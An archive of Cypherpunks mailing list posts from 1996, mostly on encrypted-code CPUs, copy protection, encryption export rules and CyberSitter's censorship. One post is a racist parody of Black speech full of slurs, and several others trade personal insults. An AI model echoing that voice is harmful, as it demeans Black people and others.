
> Right; the only reason I could see people using this would be for
> economical reasons.

Yes, I think this is a point often missed in these discussions.  People
say, why would I want a CPU which will limit the software I can run,
something which will let a software maker give me a version of his
program which will only run on my CPU and which I have no ability to
share with others?  What's in it for me?

The answer presumably is that the software manufacturer will sell software
with such limits for much less than he will sell unlimited software.  That's
because software piracy is such a major problem, and this way he can be
protected against piracy from this copy of his program.  So people with
these CPU's can buy their software a lot cheaper.

Now if you only use pirated software anyway, which you get for free, then
obviously this is not much of an incentive.  It is only for people who
pay for their software.  But that is a significant market.

Of course the big downside is that the track record of tamper resistant
hardware has not been too strong lately!  If a system like this gets into
widespread use and somebody finds out that shooting X-rays at the chip
exposes its secret key, you've got a big problem.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Fri, 20 Dec 1996 11:40:45 -0800 (PST)
To: vangelis@pnis.net (Vangelis)
Subject: Re: Credentials without Identity--Race Bits
In-Reply-To: <32BA5ABE.64F2@pnis.net>
Message-ID: <199612201329.IAA00716@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


Vangelis wrote:
| Bill Stewart wrote:
| > I've heard that in less civilized parts of the world you're actually
| > required to carry government-issued ID cards to walk down the street
| > or fly on airplanes.

| Umm.. tried to get on a flight without having ID lately?  Doesn't work -
| against policy.  Anti-terrorism policy and all.. it's for your own
| safety, of course.

	Yep.  Sucseeded, twice.  Once, having made jokes about
smuggling cocaine.

	Given the poor state of FAA modelling of their threat, I'm not
going to discuss the loopholes that I found, since the FAA will simply
close them, without bothering to wonder about the security
implications.

	I will note that you can't get on board with checked luggage,
and also note that the rules are probably subject to a FOIA request.

Adam
-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 20 Dec 1996 11:05:30 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Proof that "cypher punks" have complete degenerated...
In-Reply-To: <32B97685.69BA@gte.net>
Message-ID: <3qm9yD15w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Dale Thorn <dthorn@gte.net> writes:
> geeman@best.com wrote:
> > It wasn't worth commenting on.
> > Appending data after the ctrl-Z as stego?
> > Not even worth a letter to the ed!
>
> > Dr.Dimitri Vulis KOTM wrote:
> > > No one even commented on the latest Dr. Dobbs issue.
>
> After seeing the initial post, I ran out to get a copy, but they were
> all gone.  I find it hard to believe that appending data to a file is
> considered stego, even by a commercial publication such as Dr. Dobb's.
> Can anyone confirm this?

I agree that Dr.Dobb's ain't what it used to was (they mention that Bruce
Scheneier is a contributing editor - a bad sign), but this issue was
worth getting.

1. A very interesting interview with Eva Bozoki, chief scientist as
Digital Secure Networks Technology. Among other fascinating stuff
she complains about export controls.

2. "The RIPEMD-160 Cryptographic Hash Function" (with C source code).

3. A nice article explaining Reed-Solomon error correction, with
nice-looking C source code.

4. An announcement of a free compression library (the article only discusses
the APIs, not the internals).

5.  A discussion on hooking system calls in WinNT, allowing a program to
monitor system activity.

6. "Steganography for DOS programmers." Yes, it suggests putting data to
be hidden after a ctrl-Z, which hardly qualifies as stego, IMO. Not a
good article.

7. An article on extended MAPI 1.0 (I was looking for a place for crypto
hooks), announcing some inetersting code.

8. A discussing of publishing databases on the internet, including payment
systems.

9. A discussion if fractal-based compression (again, API's, not the guts).

Other interesting stuff with no crypto-relevance.

...
> I guess at the time their philosophy was something like "Yes, we live
> in a world of crap, so, since we have to make a living with this crap,
> let's deny that it's crap so we can continue to sell the stuff", etc.
> Kinda like *certain* c-punks, who have nothing to say, so they blame
> myself or Dr. Vulis for interfering with their degenerate doings on
> the c-punks list.

Byte magazine used to be very useful from the beginning to about '86,
when it turned into another Ziff-Davis clone. I have most of the issues
from that time filed somewhere. It's still relevant.

I guess good publications don't survive in the free market environment.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 20 Dec 1996 11:36:19 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: "Cypher punks'" sexual preferences
In-Reply-To: <32BA4609.3EE8@gte.net>
Message-ID: <XXN9yD17w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Dale Thorn <dthorn@gte.net> writes:

> Dr.Dimitri Vulis KOTM wrote:
> > Mark Allyn 206-860-9454 <allyn@allyn.com> writes:
> > > I am gay.
>
> > Mazal Tov. So are John Gilmore and Jason Durbin.
>
> The problem with the "I am" portion of the above is it's not a whole lot
> more defining than "I am" a federal agent, or "I am" a religious zealot,
> or "I am" a cryptologist.
>
> If you're a "man" or a "woman", chances are most people will know that
> for sure, in person that is.  But when a person says "I'm gay", how do
> you know it's true?  Maybe they just wanna play gay, to get better
> acceptance on the c-punks list.
>
> Used to be, "gay" was something different, i.e., "The child who's born
> on the sabbath day, is bonnie and blithe, and good and gay". What have
> they done to my language....

The soldarity displayed by the likes of A.Bostick, Jason Durbin (slothrop),
and John Gilmore is truly remarkable. These people don't care what the
commotion is all about: if one of their kind needs support, he'll get it
in form of obscenities and spam directed at his "enemies".

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Fri, 20 Dec 1996 11:39:21 -0800 (PST)
To: Vangelis <stewarts@ix.netcom.com>
Subject: Re: Credentials without Identity--Race Bits
In-Reply-To: <1.5.4.32.19961220040241.003a6284@popd.ix.netcom.com>
Message-ID: <v03007800aee07e16a6b5@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:22 AM -0800 12/20/96, Vangelis wrote:
>Bill Stewart wrote:
>> I've heard that in less civilized parts of the world you're actually
>> required to carry government-issued ID cards to walk down the street
>> or fly on airplanes.
>
>Umm.. tried to get on a flight without having ID lately?  Doesn't work -
>against policy.  Anti-terrorism policy and all.. it's for your own
>safety, of course.

At the risk of undercutting Bill's facetiousness, this was of course
precisely his point.

(Note: To a lot of us, even seeing the English form "I've heard that in
less civilized countries...." is almost a direct cue that a facetious
(tongue in cheek, ironic, etc.) remark is about to follow.)

I've heard that in less civilized countries, the same cues for irony may
not be widely known.


--Tim May

Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: michael.tighe@Central.Sun.COM (Michael Tighe SUN IMP)
Date: Fri, 20 Dec 1996 11:39:53 -0800 (PST)
To: cypherpunks-errors@toad.com (John Gilmore)
Subject: Re: Bernstein (export laws unconstitutional) decision update
In-Reply-To: <199612192112.NAA28059@toad.com>
Message-ID: <199612201536.JAA15195@jeep.Central.Sun.COM>
MIME-Version: 1.0
Content-Type: text


John Gilmore writes:

>After further consultations with the attorneys, we are not sure
>whether the decision has nationwide impact or whether it is limited
>to the Northern District of California (which includes SF and Silicon
>Valley).  Your Mileage May Vary -- check with your lawyer.

The decision itself says it only applies to Bernstein, and then only for
source code.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 20 Dec 1996 11:47:41 -0800 (PST)
To: cypherpunks@toad.com
Subject: FWD: PGP-fone Mailing List Archive
Message-ID: <1.5.4.32.19961220173903.003a89e8@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Fri, 20 Dec 1996 07:32:52 -0500 (EST)
>From: "Fred B. Ringel" <fredr@rivertown.net>
>To: pgp-fone@rivertown.net
>cc: pgp-users list <pgp-users@rivertown.net>
>Subject: Mailing List Archive

>Hi all-
>
>	Finally got around to doing something I had meant to do. I have set
>up an HTML-ized version of the PGPfone Mailing List archives. It is
>reachable off the PGP Fone Registry, but the exact URL is :
>
>	http://pgp.rivertown.net/pgp-fone/archives
>
>Now any newcomers to the list will find it easier to catch up, or if you
>need to look something up, the archives are indexed by date, author,
>and subject/thread. Hope you find it useful. Until I figure out how to
>update it automatically over an NFS mounted system, I will manually update
>them at least once a week.
>
>	I'm sending this to PGP-Users too so anyone interested in the
>PGPfone list can get a taste of what is going on there. The PGPFone list is
>up to almost 100 subscribers and growing (tell your friends!!)
>
>	Fred
>/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
>Fred B. Ringel			--	Rivertown.Net Internet Access
>Systems Administrator		--	http://www.rivertown.net
>and General Fixer Upper		--	Voice/Fax/Support: +1.914.478.2885
>
>
>

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk/pub/crypto/pgp
#     (If this is a mailing list, please Cc: me on replies.  Thanks.)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Fri, 20 Dec 1996 11:38:14 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Executing Encrypted Code
In-Reply-To: <v02140b07aedfe64543d0@[192.0.2.1]>
Message-ID: <v03007808aee07e209fdc@[207.94.112.213]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:16 PM -0800 12/19/96, Peter Hendrickson wrote:
>At 9:52 PM 12/19/1996, Bill Frantz wrote:
>>At 12:08 PM -0800 12/19/96, Peter Hendrickson wrote:
>>> If each chip has a unique public/secret key pair, and executes
>>> authenticated code only, there are some interesting implications.
>
>>> Software piracy becomes difficult, if not impossible.  Code is sold
>>> on a processor by processor basis.  Code for a different physical
>>> processor cannot be decrypted or executed.
>
>> This makes backup hard.  That is the rock the routine copy protection hit
>> up against.  There were many, me included, who simply said, "If your
>> product is copy protected then I will buy from your competitor."
>
>No, you can backup just as much as many times as you like.  The code
>isn't stored on the chip permanently, it is only decrypted there.
>
>There is a similar problem, though.  If your processor dies you could
>lose your software library.  There are ways to mitigate this.  One is
>for the vendors to just trust people and reissue the code to a new
>processor.  Of course, you track how often you have to do this.
>
>Or, you could turn in the broken processor and have the manufacturer
>certify that it was turned in to the software vendors and that
>a new version of the software should be generated.

I meant processor backup of course.  When my processor breaks at 2AM and I
need to get the report out by 8AM, I'm going to call the software support
line and get help.  Or the friendly hardware manufacturer is going to come
right out and certify my processor is dead.  Come on and get real.  With
most software vendors I can't even submit a bug report.

Note that I am not saying there is a technical problem here.  I do see big
problems with infrastructure and marketing.  The last time software
companies tried to market copy protection, it failed in the market place.
I predict that encyphered instruction streams will too, and for the same
reasons.


-------------------------------------------------------------------------
Bill Frantz       | I still read when I should | Periwinkle -- Consulting
(408)356-8506     | be doing something else.   | 16345 Englewood Ave.
frantz@netcom.com | It's a vice. - R. Heinlein | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 20 Dec 1996 11:39:41 -0800 (PST)
To: cypherpunks@toad.com
Subject: Key Escrow Rule
Message-ID: <1.5.4.32.19961220160831.006a4f7c@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


The Federal Register of December 13, 1996 has published

"Licensing of Key Escrow Encryption Equipment and Software"

This parallels the draft regulations for encryption export 
provided by Steptoe & Johnson on December 11 but sets 
provisions specifically for key escrow products.

We've put it at:

   http://jya.com/ke121396.htm  (39 kb)

Here are excerpts from the opening:

-----------------------------------------------------------------------

    This interim final rule amends the Export Administration 
Regulations (EAR) by imposing national security controls on Key escrow 
information security (encryption) equipment and software transferred 
from the U.S. Munitions List to the Commerce Control List following a 
commodity jurisdiction determination by the Department of State.

    This interim final rule also amends the EAR to exclude key escrow 
items from the de minimis provisions for items exported from abroad and 
to exclude key escrow encryption software from mass market eligibility. 
Further, key escrow encryption software is subject to the EAR even when 
made publicly available. ...

    Once transferred, key escrow encryption items will be controlled 
for national security reasons. A license will be required from the 
Department of Commerce to all destinations, except Canada. This is an 
initial step in liberalizing the treatment of encryption exports.

    The Bureau of Export Administration is preparing regulations to 
further implement the Administration's encryption policies, which will 
be published in the Federal Register in the near future. ...








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve O <privsoft@ix.netcom.com>
Date: Fri, 20 Dec 1996 11:06:18 -0800 (PST)
To: cypherpunks@toad.com
Subject: Test files for encryption
Message-ID: <1.5.4.16.19961220143414.3e4ffbb8@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Can someone point me to any standard files that are used when testing
encryption strength. Iie i'm looking for a gourp of files that may have been
used by an agency or Internet group in the past that when encrypted were
tested for byte frequency etc. as well as cryptoanalytic atacks. thanks in
advance.
steveo
privsoft@ix.netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 20 Dec 1996 11:39:51 -0800 (PST)
To: cypherpunks@toad.com
Subject: BXA Crypto Meeting
Message-ID: <1.5.4.32.19961220162515.00681b90@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Federal Register: December 12, 1996

-----------------------------------------------------------------------

Bureau of Export Administration
 
Information Systems, Technical Advisory Committee; Notice of 
Partially Closed Meeting

    A meeting of the Information Systems Technical Advisory Committee 
will be held January 7 & 8, Room 1617M-2, in the Herbert C. Hoover 
Building, 14th Street between Constitution and Pennsylvania Avenues, 
NW., Washington, DC. This Committee advises the Office of the Assistant 
Secretary for Export Administration with respect to technical questions 
that affect the level of export controls applicable to information 
systems equipment and technology.

January 7

General Session

9:00 a.m.-12:00 p.m.
    1. Opening remarks by the Chairmen.
    2. Presentation on Office of Exporter Services outreach program.
    3. Update on status of Export Administration Regulations.
    4. Public discussion on encryption issues.
    5. Other comments or presentations by the public.

Closed Session

    6. Discussion of matters properly classified under Executive Order 
12958, dealing with U.S. export control programs and strategic criteria 
related thereto.

January 8

Closed Session

    7. Discussion of matters properly classified under Executive Order 
12958, dealing with U.S. export control programs and strategic criteria 
related thereto.

    The General Session of the meeting is open to the public and a 
limited number of seats will be available. To the extent time permits, 
members of the public may present oral statements to the Committee. 
Written statements may be submitted at any time before or after the 
meeting. However, to facilitate distribution of public presentation 
materials to the Committee members, the Committee suggests that public 
presentation materials or comments be forwarded at least one week 
before the meeting to the address listed below:

Ms. Lee Ann Carpenter, TAC Unit/OAS/EA, Room 3886C, Bureau of Export 
Administration, U.S. Department of Commerce, Washington, DC 20230

Dated: December 6, 1996.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Fri, 20 Dec 1996 11:04:38 -0800 (PST)
To: cypherpunks@toad.com
Subject: Ebonics
Message-ID: <v03007800aee0969f48f7@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



In order to remain compliant with the new California law requiring
increased use of "Ebonics," the new academic name for "Black English" (and
known by honkey mofos as "ghetto jive"). Apparently the coloreds have had
enough of "standard English" and its repression of their culture. To meet
the requirements of this new law, 10% of my posts from now on will be
written as best I can manage in the Ebonic language.

Switching to Ebonics:


De honks be chimin.' Code be fly! I's huffa be gots to be sizing, bitch.
PGP 3 be dope, nuffin but bad!

I be axing you if it be outa honkeyland or outa Afrika? Dat bitch Reno be
sayin' it be 'legal be usin' dope 'warez. Day be hos.


--a melanin-challenged honkey mofo


Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila@primenet.com
Date: Fri, 20 Dec 1996 11:42:28 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: Nuke the Whales!
In-Reply-To: <32BA31CE.7B64@gte.net>
Message-ID: <199612201150.EAA01646@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

        Oh, come on, Dale. loosen up and recognize satire when you see it.

        satire is a far cry from sarcasm, and although it may appear to 
    have a victim, it is more of a social comment in general.

        good sarcasm can even tell stories which are bald faced lies and 
    still not be dishonest --caveat emptor.

==
  I'll get a life when it is proven
    and substantiated to be better
      than what I am currently experiencing.
            --attila

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: Encrypted with 2.6.3i. Requires 2.6 or later.

iQCVAwUBMrp8kr04kQrCC2kFAQHYVwP/QwNZCVr034lH/yuJqanEc4aGeoKbJOwh
73yKSyOTRUI0Fll5X8Q8mgHGdMbN9TJTke3zstYztSe5MY5vrJnGGIPWTIIkQmXn
QYmNdNE4X0Ytaum32MEkbybi9VxmIZYEuD49dAAShKdQWMacWE6YnxAzKyYGi5Rp
T1iaYRdcZo8=
=p0Vu
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jazzmin Belle Sommers <jazzmin@ou.edu>
Date: Fri, 20 Dec 1996 11:38:49 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Executing Encrypted Code
Message-ID: <32bad01e16c5002@cliff.ou.edu>
MIME-Version: 1.0
Content-Type: text/plain



>>>> You could also timestamp the software so that it only runs for a given
>>>> length of time.  This will encourage people to upgrade regularly.  ;-)

>>> Or to reset their clocks. Which is what many of us do when software is
>>> about to "expire."

>>However, why not use "beacons"?  

chop chop chop

I have been using some shareware that simply has a built-in counter.  Once
the counter runs out, you have to register.  I would suppose that one could
hack the code to find the counter, assuming you could decompile it (or
wanted to).

Personally I think this is a decent solution to the problem -- the counter
on this particular software let you use it 50 times.  That's adequate to
determine whether you want to keep it or not.

Of course, if you saved the .zip file to disk before you installed it, you
could delete the copy and reinstall the .zip.  But everyone knows this.

Jazzmin Sommers






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root@ace.cnl.com.au (System Administrator)
Date: Thu, 19 Dec 1996 16:35:30 -0800 (PST)
To: dlv@bwalk.dm.com
Subject: Re: EFF: Bernstein court declares crypto restrictions unconstitutiona
Message-ID: <m0vatAR-00091cC@ace.cnl.com.au>
MIME-Version: 1.0
Content-Type: text/plain






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Fri, 20 Dec 1996 11:53:01 -0800 (PST)
To: Bill Frantz <cypherpunks@toad.com
Subject: Re: Executing Encrypted Code
Message-ID: <v02140b02aee098f27cff@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:42 AM 12/20/1996, Bill Frantz wrote:
>At 11:16 PM -0800 12/19/96, Peter Hendrickson wrote:
>> Or, you could turn in the broken processor and have the manufacturer
>> certify that it was turned in to the software vendors and that
>> a new version of the software should be generated.

> I meant processor backup of course.  When my processor breaks at 2AM and I
> need to get the report out by 8AM, I'm going to call the software support
> line and get help.

If your processor dies you are SOL whether or not you have software.

If it's worthwhile having a backup processor around, then you just have
to spend a little more to have backup software, too.

> Or the friendly hardware manufacturer is going to come
> right out and certify my processor is dead.  Come on and get real.  With
> most software vendors I can't even submit a bug report.

If the reissuance of software is not possible (which I don't believe),
it's an acceptable risk.  Processors die far far less often than disks,
and disks are getting pretty reliable.

If the software companies can't get it together to reissue software,
then it would certainly be easy to sell processor insurance to people
who wanted it.  This would allow them to replace their ~$10,000 software
library.  (You can buy theft insurance for roughly the same payoffs,
so it's a feasible business.  Theft is harder to verify and in my
judgement occurs much more frequently than processor failure.)

> Note that I am not saying there is a technical problem here.  I do see big
> problems with infrastructure and marketing.  The last time software
> companies tried to market copy protection, it failed in the market place.
> I predict that encyphered instruction streams will too, and for the same
> reasons.

If the old copy protection just worked, it would have been widely accepted.

Old copy protection had many problems.  It didn't stop piracy.  Sometimes
it crashed your machine.  Some schemes worked on some Intel machines but
not on others.  Backups were a problem.  Etcetara.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Fri, 20 Dec 1996 12:26:26 -0800 (PST)
To: Hal Finney <cypherpunks@toad.com
Subject: Re: Executing Encrypted Code
Message-ID: <v02140b04aee09fe91fdf@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:43 AM 12/20/1996, Hal Finney wrote:
>> The manufacturer is going to publish a list of ALL of the public keys?
>> We're talking one key per chip, right?  Isn't that an AWFUL lot of
>> keys, like, in the millions range?

> Probably an easier way would be for the chip manufacturer to issue a
> key certificate (signature) on the chip keys.  Then it is a trivial
> matter for any software manufacturer to verify that a proferred chip
> key is legit; just check the cert.

Now why didn't I think of that!

>>> One approach is for the manufacturer to authenticate software submitted
>>> by approved vendors.  The vendors are then tasked with encrypting it
>>> for the correct processor.

>> I'm not sure the "approved" bit would go over too well... one idea
>> would be to license the compiler writers, who would build the
>> encryption into compilers.  It's still not horribly great, but
>> better.

> Hey, it's a free world, right?  Some people only run authenticated
> code from big companies; other people turn off the authentication
> bit in the CPU and can run any old thing they stumble across on the net.
> Everybody's happy.

Maybe not everybody.  My scheme would not let you turn off the authentication
bit.  That means that if somebody does find way to get at the secret
key, they still can't run the code without doing something expensive with
particular processors.  Basically, this won't be worth the trouble.

> The first group doesn't have to worry about viruses,
> or at least they have somebody to sue if they see one, and the second
> group gets to run all the freeware and PD code they can today.

The second group would have to buy a different processor altogether,
the way I proposed it.  But, that does not seem unreasonable.  One
could even imagine systems which have a "free" processor and a
decrypting processor.  While they would have to have completely different
instruction sets, they could be pin compatible.

>> Right; the only reason I could see people using this would be for
>> economical reasons.

> Yes, I think this is a point often missed in these discussions.  People
> say, why would I want a CPU which will limit the software I can run,
> something which will let a software maker give me a version of his
> program which will only run on my CPU and which I have no ability to
> share with others?  What's in it for me?

> The answer presumably is that the software manufacturer will sell software
> with such limits for much less than he will sell unlimited software.  That's
> because software piracy is such a major problem, and this way he can be
> protected against piracy from this copy of his program.  So people with
> these CPU's can buy their software a lot cheaper.

I agree with all of this.  Some people might be happier if they think
of this as just another kind of agreement that people can make.  Right
now the software development agreement is weak because piracy is so
easy.  We rely a little bit on the law and a whole lot on the integrity
of customers.  Really, that isn't ideal.  It would be nice if people
could make strong agreements to write software.

My judgement is that software piracy is less of a problem in the U.S.
than it is elsewhere.  My impression is that there are many other
countries in the world where the whole "I should help pay for the
development of this software because I am using it" idea just doesn't
really show up on the screen.

This processor would make it possible to sell software to the whole
world without really worrying too much about how well each government
enforces its laws or how ethical the people in foreign countries are.

> Of course the big downside is that the track record of tamper resistant
> hardware has not been too strong lately!  If a system like this gets into
> widespread use and somebody finds out that shooting X-rays at the chip
> exposes its secret key, you've got a big problem.

Processors are really only good for 3 years or so.  The vendor is only
betting that attacks won't become widespread in that time period.  That
is not a perfectly safe bet, but it isn't bad.  The attacks can exist,
but so long as they are expensive or hard to generalize to all processors,
the software vendors are safe.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Fri, 20 Dec 1996 12:55:14 -0800 (PST)
To: cypherpunks@toad.com
Subject: The CyberSitter Diaper Change, from The Netly News
Message-ID: <Pine.GSO.3.95.961220125419.19668C-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain


[From this morning's Netly News. Check out the HTML version of the article
at netlynews.com for links to the threatening letters, etc. --Declan]

The Netly News
http://netlynews.com/
December 20, 1996

The CyberSitter Diaper Change
By Declan McCullagh (declan@well.com)
                                      
        Brian Milburn is angry. The president of Solid Oak Software,
   makers of the CyberSitter Net-filtering software, has seen his
   company's product come under heavy fire this year. Its offense?
   Critics say that CyberSitter has reached far beyond its mandate of
   porn-blocking and instead has censored innocuous, even invaluable web
   sites.
   
        I admit I'm one of its critics. In a CyberWire Dispatch that
   Brock Meeks and I published in July, we revealed that the censorware
   bans such places as the International Gay and Lesbian Human Rights
   Commission and the online home of the National Organization for Women.
   Our Dispatch showed the world -- or at least our readers -- that the
   makers of CyberSitter have a clear political agenda. The article
   prompted follow-ups in CyberTimes and the National Law Journal and an
   editorial in the Washington Post with an exchange of letters to the
   editor between a NOW executive and a representative of Focus on the
   Family, a conservative group that markets CyberSitter.
   
        To Milburn's mind, our act of revealing the truth about his
   company's product was, literally, criminal. In August, he told us that
   he had asked the U.S. Department of Justice to launch a criminal
   investigation into the publication of our article. He was particularly
   upset with one paragraph that included a fragment of his database
   demonstrating that CyberSitter expressly bans info about gay society
   and culture.
   
       He wrote: "Your willful reverse engineering and subsequent
   publishing of copyrighted source code is a clear violation of US
   Copyright law. While we would easily prevail in a civil court in
   seeking damages... we will seek felony criminal prosecution under 17
   USCS sect 503(a) of the Copyright Act, and are preparing documentation
   to submit with the criminal complaint to FBI [sic]."
   
        Milburn was upset because CyberSitter's database is scrambled to
   prevent kiddies from grabbing addresses of porn sites from it. It's
   lightweight encryption, sure, but just enough to frustrate Junior. The
   scrambled database also allows Solid Oak to add and delete banned
   sites without the user's knowledge -- something that we believe is a
   dangerous practice. Now, I should point out here that neither I nor
   Brock did the actual decrypting; we had received a copy of the
   descrambled filter list from a confidential source.
   
        In any event, Dispatch's attorneys replied to Milburn, saying
   that the article was "protected by the full force of the First
   Amendment to the United States Constitution" and fell squarely within
   the copyright act's "fair use" provisions. We never heard back from
   him or the FBI.
   
        But that nastygram from Milburn wasn't his last. As criticism of
   CyberSitter becomes more intense, he's stepped up his counterattacks,
   threatening legal action, blocking critics' sites, or both.
   
        Take Bennett Haselton, a college student who cobbled together a
   site called Peacefire in August. This fall he started an
   anti-CyberSitter page that listed some of the more controversial
   actions of the software.
   
        Milburn complained. On December 6 he wrote to Haselton's Internet
   provider, Media3 Technologies, and tried to persuade them to give
   Peacefire the boot. His e-mail said: "One of your subscribers has made
   it his mission in life to defame our product as he appearantly [sic]
   has a problem with parents wishing to filter their children's access
   to the internet." Another charge was that Haselton had linked to a
   copy of our Dispatch.
   
        Solid Oak then added Peacefire and Media3 to its list of blocked
   sites. To Marc Kanter, Solid Oak's marketing director, it was
   necessary. "The site directly has links to areas that have our source
   code decoded on it.... There's no reason that our users should be able
   to go to sites that effectually inactivate our program," he said.
   
        Milburn also accused Haselton of reverse-engineering CyberSitter
   to get the text of its database -- that is, of being the confidential
   source for the CyberWire Dispatch. "Reverse engineering had to have
   been done in order to get the information, and we believe Mr. Haselton
   was the one who did it," Milburn wrote.
   
        Note to Millburn: Haselton wasn't our source.
   
        Then there's the case of Glen Roberts. His web page giving
   instructions on how to disable CyberSitter is now banned -- as is his
   Internet service provider. That's because CyberSitter differs from its
   competitors CyberPatrol and SurfWatch, which can restrict access by
   URL; instead, CyberSitter has to block access to the entire ripco.com
   domain.
   
        So what's my problem, really? If people don't want to use
   CyberSitter or other nanny apps, they don't have to. It's voluntary.
   It's effective. It protects children, and it sure is better than the
   Communications Decency Act.
   
        I have one major objection to all of the software filters
   currently on the market: Consumers have no way of knowing what's being
   blocked. Without knowing what's on the filter list, parents can't know
   what Junior will or won't be seeing. When reporters who try to reveal
   that information are faced with potential criminal investigations, the
   press's ability to shed light on these companies is threatened.
   
        Such programs also give parents near-complete control over what
   their children can and can't read. Traditionally, kids have been able
   to browse the stacks of a library away from parental supervision. But
   when the library is online, access can be completely controlled by
   censorware. Pity the closeted gay son of homophobic parents, prevented
   by CyberSitter from accessing soc.support.youth.lesbian-gay-bi.
   
        Finally, it's a kind of intellectual bait-and-switch. The "smut
   blockers" grab power by playing to porn, then they wield it to advance
   a right-wing, conservative agenda. Family values activists would never
   have been able to pass a law that blocks as many sites as CyberSitter
   does. Besides censoring alt.censorship, it also blocks dozens of ISPs
   and university sites such as well.com, zoom.com, anon.penet.fi,
   best.com, webpower.com, ftp.std.com, cts.com, gwis2.seas.gwu.edu,
   hss.cmu.edu, c2.org, echonyc.com and accounting.com. Now, sadly, some
   libraries are using it. Solid Oak claims 900,000 registered users.
   
###





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Fri, 20 Dec 1996 13:46:38 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Executing Encrypted Code
In-Reply-To: <v02140b02aee098f27cff@[192.0.2.1]>
Message-ID: <v0300780daee0b326161c@[207.94.112.213]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:52 AM -0800 12/20/96, Peter Hendrickson wrote:
>At 9:42 AM 12/20/1996, Bill Frantz wrote:
>> I meant processor backup of course.  When my processor breaks at 2AM and I
>> need to get the report out by 8AM, I'm going to call the software support
>> line and get help.
>
>If your processor dies you are SOL whether or not you have software.

I have 3 Macs in the house.  The places I work have rooms full of machines.


>If it's worthwhile having a backup processor around, then you just have
>to spend a little more to have backup software, too.

I thought your model was cheap processors and expensive software.  I.e.,.
The cost of the software is greater than the cost of the hardware.  Sounds
like more than just "a little more".


